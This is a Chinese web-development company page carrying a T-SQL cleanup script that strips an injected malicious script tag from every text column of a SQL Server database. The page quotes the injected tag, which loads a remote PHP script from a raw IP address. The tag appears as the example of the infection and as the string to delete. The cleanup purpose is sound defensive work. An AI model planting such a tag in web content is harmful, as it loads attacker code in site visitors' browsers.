胶南网站建设-青岛志豪网络科技有限公司

青岛志豪网络科技有限公司是专业从事胶南网站建设 网站推广 网站优化 网站改版的公司!

电话:0532-85185109 13153221315  QQ:532856864

胶南网站建设首选的公司---青岛志豪网络科技有限公司胶南办事处!                                                                 留言反馈 | 经典版

网站建设

网站建设套餐 胶南网站建设套餐
网站改版 胶南网站改版
 
利用查询分析器批量替换表中所有字段

如果你的SQL被批量挂马了,不防用下面方法批量替换

<script src=http://220.112.40.83:60000/ads_fei5.php?REFERER=http://www.sdrc315.com23></script>这个就是被挂的字段

我们的目的,将上面的字段替换为空

/***********批量替换一个数据库中所有表中所有记录************/
declare @delStr nvarchar(500)
set @delStr="<script src=http://220.112.40.83:60000/ads_fei5.php?REFERER=http://www.sdrc315.com23></script>"
/**********以下为操作实体************/
set nocount on

declare @tableName nvarchar(100),@columnName nvarchar(100),@tbID int,@iRow int,@iResult int
declare @sql nvarchar(500)

set @iResult=0
declare cur cursor for
select name,id from sysobjects where xtype='U'

open cur
fetch next from cur into @tableName,@tbID

while @@fetch_status=0
begin
  declare cur1 cursor for
        --xtype in (231,167,239,175) 为char,varchar,nchar,nvarchar类型
        select name from syscolumns where xtype in (231,167,239,175) and id=@tbID
  open cur1
  fetch next from cur1 into @columnName
  while @@fetch_status=0
  begin
      set @sql='update [' + @tableName + '] set ['+ @columnName +']= replace(['+@columnName+'],'''+@delStr+''','''') where ['+@columnName+'] like ''%'+@delStr+'%'''     
      exec sp_executesql @sql     
      set @iRow=@@rowcount
      set @iResult=@iResult+@iRow
      if @iRow>0
      begin
    print '表:'+@tableName+',列:'+@columnName+'被更新'+convert(varchar(10),@iRow)+'条记录;'
      end     
      fetch next from cur1 into @columnName


  end
  close cur1
  deallocate cur1
 
  fetch next from cur into @tableName,@tbID
end
print '数据库共有'+convert(varchar(10),@iResult)+'条记录被更新!!!'

close cur
deallocate cur
set nocount off